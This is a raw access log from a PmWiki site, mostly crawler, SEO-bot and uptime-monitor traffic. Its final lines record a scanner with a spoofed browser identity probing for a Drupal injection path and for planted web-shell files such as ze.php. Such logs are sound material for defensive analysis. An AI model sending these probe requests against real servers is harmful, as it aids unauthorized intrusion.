216.244.66.203 - - [16/Jul/2023:17:20:30 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
212.237.51.151 - - [16/Jul/2023:17:23:50 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
216.244.66.203 - - [16/Jul/2023:17:36:41 +0200] "GET /pmwiki/pmwiki.php/Main/Rocard?action=diff&source=y&minor=n HTTP/1.1" 200 18917 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.66.10 - - [16/Jul/2023:17:57:47 +0200] "GET /pmwiki/pmwiki.php/Main/MiADRM?action=print HTTP/1.1" 403 30 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.179 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.203 - - [16/Jul/2023:18:15:51 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
49.12.13.109 - - [16/Jul/2023:18:22:54 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
216.244.66.203 - - [16/Jul/2023:18:39:56 +0200] "GET /pmwiki/pmwiki.php/Profiles/AdelphiCharter?action=diff&source=y&minor=n HTTP/1.1" 200 12981 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
95.108.213.172 - - [16/Jul/2023:18:42:18 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.213.168 - - [16/Jul/2023:18:42:19 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekPrivacy?action=edit HTTP/1.1" 200 12480 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
111.225.148.117 - - [16/Jul/2023:19:06:32 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
216.244.66.203 - - [16/Jul/2023:19:11:19 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
212.237.53.115 - - [16/Jul/2023:19:20:15 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.254 - - [16/Jul/2023:19:23:21 +0200] "GET /pmwiki/pmwiki.php/Main/2003M%E1jusiNyilatkozat?action=upload HTTP/1.1" 200 12514 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.244.66.203 - - [16/Jul/2023:19:40:16 +0200] "GET /pmwiki/pmwiki.php/Emeltdijas/Hu?action=diff&source=y&minor=n HTTP/1.1" 200 14491 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [16/Jul/2023:19:40:21 +0200] "GET /pmwiki/pmwiki.php/Main/NoSoftwarePatents?action=diff&source=y&minor=n HTTP/1.1" 200 13474 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
54.36.148.162 - - [16/Jul/2023:19:56:57 +0200] "GET /pmwiki/pmwiki.php/Main/Marc08essay?action=edit HTTP/1.1" 200 12446 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.237.53.115 - - [16/Jul/2023:20:16:30 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
216.244.66.203 - - [16/Jul/2023:21:03:13 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
212.237.51.151 - - [16/Jul/2023:21:07:58 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
216.244.66.203 - - [16/Jul/2023:21:23:52 +0200] "GET /pmwiki/pmwiki.php/Main/AzIPRJavaslat?action=diff&source=y&minor=n HTTP/1.1" 200 16280 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [16/Jul/2023:21:23:57 +0200] "GET /pmwiki/pmwiki.php/Main/Minimum?action=diff&source=y&minor=n HTTP/1.1" 200 22046 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [16/Jul/2023:21:24:01 +0200] "GET /pmwiki/pmwiki.php/PmWiki/UrlApprovals?action=diff&source=y&minor=n HTTP/1.1" 200 12910 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
54.36.149.41 - - [16/Jul/2023:21:41:51 +0200] "GET /pmwiki/pmwiki.php/Main/Nyilatkozatok HTTP/1.1" 200 16071 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [16/Jul/2023:22:07:16 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
49.12.13.109 - - [16/Jul/2023:23:06:22 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
54.36.149.37 - - [16/Jul/2023:23:11:05 +0200] "GET /pmwiki/pmwiki.php/Main/Marc08essay?action=diff HTTP/1.1" 200 76748 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.253.7 - - [16/Jul/2023:23:55:03 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.130 - - [16/Jul/2023:23:55:05 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekPrivacy HTTP/1.1" 200 12503 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.237.53.115 - - [16/Jul/2023:23:59:33 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.220 - - [17/Jul/2023:00:43:16 +0200] "GET /pmwiki/pmwiki.php/Main/Gazdas%E1giOldal HTTP/1.1" 200 19537 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.237.23.143 - - [17/Jul/2023:01:01:52 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.226 - - [17/Jul/2023:01:06:59 +0200] "GET /pmwiki/pmwiki.php/Main/BMEKonferencia?action=print HTTP/1.1" 200 5262 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
5.255.231.22 - - [17/Jul/2023:01:34:50 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.165 - - [17/Jul/2023:01:34:51 +0200] "GET /pmwiki/pmwiki.php/Main/MiADRM?action=upload HTTP/1.1" 200 12246 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
54.36.148.109 - - [17/Jul/2023:01:37:09 +0200] "GET /pmwiki/pmwiki.php/Main/ABundestagT%E1mogatjaAzEur%F3paiParlamentet?action=upload HTTP/1.1" 200 12834 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [17/Jul/2023:02:00:57 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
54.36.148.30 - - [17/Jul/2023:02:32:56 +0200] "GET /pmwiki/pmwiki.php/Main/ABundestagT%E1mogatjaAzEur%F3paiParlamentet?action=print HTTP/1.1" 200 8394 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.66.205 - - [17/Jul/2023:02:35:51 +0200] "GET /pmwiki/pmwiki.php/Main/Ipr?action=edit HTTP/1.1" 403 30 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.179 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.237.23.143 - - [17/Jul/2023:02:56:04 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.242 - - [17/Jul/2023:03:04:46 +0200] "GET /pmwiki/pmwiki.php/Main/Rocard?action=upload HTTP/1.1" 200 12245 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [17/Jul/2023:03:23:50 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.23 - - [17/Jul/2023:03:33:08 +0200] "GET /pmwiki/pmwiki.php/Main/ABundestagT%E1mogatjaAzEur%F3paiParlamentet?action=diff HTTP/1.1" 200 20974 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.132 - - [17/Jul/2023:03:57:57 +0200] "GET /pmwiki/pmwiki.php/Main/Tud%E1smonop%F3lium HTTP/1.1" 200 16773 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.66.165 - - [17/Jul/2023:03:59:12 +0200] "GET /pmwiki/pmwiki.php/Main/2005J%FAnius?action=print HTTP/1.1" 403 30 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.179 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.237.53.115 - - [17/Jul/2023:04:14:42 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
216.244.66.203 - - [17/Jul/2023:04:24:59 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
54.36.148.156 - - [17/Jul/2023:04:27:37 +0200] "GET /pmwiki/pmwiki.php/Main/Cikkek?action=upload HTTP/1.1" 200 12251 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
111.225.148.191 - - [17/Jul/2023:04:48:17 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
185.117.225.130 - - [17/Jul/2023:04:48:23 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "python-requests/2.31.0"
185.117.225.130 - - [17/Jul/2023:04:48:24 +0200] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
185.117.225.130 - - [17/Jul/2023:04:48:26 +0200] "GET /pmwiki/pmwiki.php HTTP/1.1" 200 37269 "-" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
185.117.225.130 - - [17/Jul/2023:04:48:26 +0200] "GET /pmwiki/pub/skins/gila/gila.css HTTP/1.1" 200 8887 "-" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
216.244.66.203 - - [17/Jul/2023:04:48:37 +0200] "GET /pmwiki/pmwiki.php/Main/Feb08PR?action=diff&source=y&minor=n HTTP/1.1" 200 20919 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
49.12.13.109 - - [17/Jul/2023:05:13:45 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
31.46.22.82 - - [17/Jul/2023:05:14:30 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
31.46.22.68 - - [17/Jul/2023:05:14:31 +0200] "GET /pmwiki/pmwiki.php/Main/JogiOldal?action=upload HTTP/1.1" 403 30 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.164 - - [17/Jul/2023:05:14:31 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.164 - - [17/Jul/2023:05:14:31 +0200] "GET /pmwiki/pmwiki.php/Main/JogiOldal?action=upload HTTP/1.1" 403 30 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.36.148.10 - - [17/Jul/2023:05:46:59 +0200] "GET /pmwiki/pmwiki.php/Main/AdelphiAlapokm%E1ny HTTP/1.1" 200 16161 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
52.76.141.169 - - [17/Jul/2023:05:55:33 +0200] "GET /pmwiki/pmwiki.php/PmWiki/CustomWikiStyles?action=print HTTP/1.1" 200 9229 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
52.76.141.169 - - [17/Jul/2023:05:55:33 +0200] "GET /pmwiki/pub/skins/print/print.css HTTP/1.1" 200 1598 "http://swpat.zpok.hu/pmwiki/pmwiki.php/PmWiki/CustomWikiStyles?action=print" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
54.251.216.163 - - [17/Jul/2023:05:59:31 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
174.115.7.70 - - [17/Jul/2023:06:03:33 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.1681.1067 Mobile Safari/537.36"
212.237.23.143 - - [17/Jul/2023:06:09:45 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.194 - - [17/Jul/2023:06:52:44 +0200] "GET /pmwiki/pmwiki.php/Main/MiADRM HTTP/1.1" 200 12869 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [17/Jul/2023:07:09:12 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
188.213.34.90 - - [17/Jul/2023:07:54:09 +0200] "GET /pmwiki/pmwiki.php/Main/Linkek HTTP/1.1" 200 28889 "http://swpat.zpok.hu" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
212.237.53.115 - - [17/Jul/2023:07:59:55 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.149.103 - - [17/Jul/2023:08:04:39 +0200] "GET /pmwiki/pmwiki.php/Main/AdelphiAlapokm%E1ny?action=diff HTTP/1.1" 200 17542 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.3 - - [17/Jul/2023:08:19:37 +0200] "GET /pmwiki/pmwiki.php/Main/Doksik HTTP/1.1" 200 14123 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
110.249.202.205 - - [17/Jul/2023:08:23:54 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
54.36.149.66 - - [17/Jul/2023:08:33:49 +0200] "GET /pmwiki/pmwiki.php/Main/Cikkek?action=diff HTTP/1.1" 200 107776 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.237.51.151 - - [17/Jul/2023:08:48:00 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.10 - - [17/Jul/2023:08:49:48 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekDRM?action=print HTTP/1.1" 200 8479 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.61 - - [17/Jul/2023:09:14:03 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekDRM?action=diff HTTP/1.1" 200 21048 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.3 - - [17/Jul/2023:09:27:39 +0200] "GET /pmwiki/pmwiki.php/Main/BMEKonferencia?action=upload HTTP/1.1" 200 12374 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.191 - - [17/Jul/2023:09:41:08 +0200] "GET /pmwiki/pmwiki.php/Main/Cikkek?action=edit HTTP/1.1" 200 12371 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [17/Jul/2023:09:47:06 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
54.36.149.69 - - [17/Jul/2023:10:23:37 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekDRM?action=edit HTTP/1.1" 200 12418 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.20 - - [17/Jul/2023:10:36:08 +0200] "GET /pmwiki/pmwiki.php/Main/RocardEp2?action=diff HTTP/1.1" 200 29492 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.237.53.115 - - [17/Jul/2023:10:39:43 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.127 - - [17/Jul/2023:10:50:38 +0200] "GET /pmwiki/pmwiki.php/Main/BMEKonferencia?action=diff HTTP/1.1" 200 76698 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.26 - - [17/Jul/2023:11:20:42 +0200] "GET /pmwiki/pmwiki.php/Main/BMEKonferencia?action=edit HTTP/1.1" 200 12494 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [17/Jul/2023:11:38:53 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
54.36.148.105 - - [17/Jul/2023:11:51:54 +0200] "GET /pmwiki/pmwiki.php/Main/ABundestagT%E1mogatjaAzEur%F3paiParlamentet?action=edit HTTP/1.1" 200 12954 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.211 - - [17/Jul/2023:12:16:39 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.100 - - [17/Jul/2023:12:16:40 +0200] "GET /pmwiki/pmwiki.php/Main/Marc08essay?action=print HTTP/1.1" 200 9200 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.92 - - [17/Jul/2023:12:16:42 +0200] "GET /pmwiki/pub/skins/print/print.css HTTP/1.1" 200 1598 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.237.53.115 - - [17/Jul/2023:12:31:47 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
95.108.213.112 - - [17/Jul/2023:12:40:03 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.213.253 - - [17/Jul/2023:12:40:03 +0200] "GET /pmwiki/pmwiki.php/Main/AJelenlegiSzerzoiJogiTorveny?action=edit HTTP/1.1" 200 12718 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
54.36.149.15 - - [17/Jul/2023:12:42:56 +0200] "GET /pmwiki/pmwiki.php/Main/RocardEp2?action=print HTTP/1.1" 200 18508 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.40 - - [17/Jul/2023:13:09:37 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekDRM?action=upload HTTP/1.1" 200 12298 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
213.180.203.24 - - [17/Jul/2023:13:10:47 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.21 - - [17/Jul/2023:13:10:48 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekDRM?action=edit HTTP/1.1" 200 12418 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
49.12.13.109 - - [17/Jul/2023:13:30:54 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
216.244.66.203 - - [17/Jul/2023:13:42:06 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
111.225.149.231 - - [17/Jul/2023:13:55:49 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
181.214.218.38 - - [17/Jul/2023:14:03:19 +0200] "GET /pmwiki/pmwiki.php/Main/Linkek HTTP/1.1" 200 28889 "http://swpat.zpok.hu" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
216.244.66.203 - - [17/Jul/2023:14:03:28 +0200] "GET /pmwiki/pmwiki.php/Main/Linkek?action=diff&source=y&minor=n HTTP/1.1" 200 36112 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
49.12.13.109 - - [17/Jul/2023:14:30:08 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
54.36.148.194 - - [17/Jul/2023:15:07:56 +0200] "GET /pmwiki/pmwiki.php/Main/AzEUBizotts%E1gaL%E1bbalTiporjaADemokr%E1ci%E1t?action=upload HTTP/1.1" 200 12886 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
77.75.77.72 - - [17/Jul/2023:15:21:32 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +http://napoveda.seznam.cz/seznambot-intro/)"
77.75.77.72 - - [17/Jul/2023:15:21:32 +0200] "GET /pmwiki/pmwiki.php/PmWiki/AuthorTracking HTTP/1.1" 200 13641 "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +http://napoveda.seznam.cz/seznambot-intro/)"
5.255.231.98 - - [17/Jul/2023:15:28:16 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.45.207.189 - - [17/Jul/2023:15:28:17 +0200] "GET /pmwiki/pmwiki.php/Main/Ipr?action=diff HTTP/1.1" 200 15128 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
49.12.13.109 - - [17/Jul/2023:15:29:11 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
216.244.66.203 - - [17/Jul/2023:15:32:17 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [17/Jul/2023:15:58:11 +0200] "GET /pmwiki/pmwiki.php/Main/2004Szeptember1?action=diff&source=y&minor=n HTTP/1.1" 200 15599 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [17/Jul/2023:15:58:14 +0200] "GET /pmwiki/pmwiki.php/Main/ToughLetter?action=diff&source=n&minor=y HTTP/1.1" 200 17383 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [17/Jul/2023:15:58:20 +0200] "GET /pmwiki/pmwiki.php/PmWiki/I18nVariables?action=diff&source=n&minor=y HTTP/1.1" 200 12929 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.66.206 - - [17/Jul/2023:16:10:52 +0200] "GET /pmwiki/pmwiki.php/Main/MiADRM? HTTP/1.1" 200 12869 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.179 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.237.51.151 - - [17/Jul/2023:16:14:29 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.22 - - [17/Jul/2023:16:25:53 +0200] "GET /pmwiki/pmwiki.php/Main/AJelenlegiSzerzoiJogiTorveny HTTP/1.1" 200 18664 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.244.66.203 - - [17/Jul/2023:16:26:49 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
195.110.153.181 - - [17/Jul/2023:16:41:06 +0200] "GET /?q=file/ajax/name/%23value/ HTTP/1.1" 302 5 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:12 +0200] "GET /pmwiki/pmwiki.php HTTP/1.1" 200 37269 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:18 +0200] "GET //sites/default/files/ze.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:18 +0200] "GET /pmwiki/pmwiki.php/Main/?q=file/ajax/name/%23value/ HTTP/1.1" 302 186 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:22 +0200] "GET /pmwiki/pmwiki.php/Main/HomePage HTTP/1.1" 200 37269 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:22 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/ze.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:23 +0200] "GET /maintenance.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:27 +0200] "GET /pmwiki/pmwiki.php/Main/maintenance.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
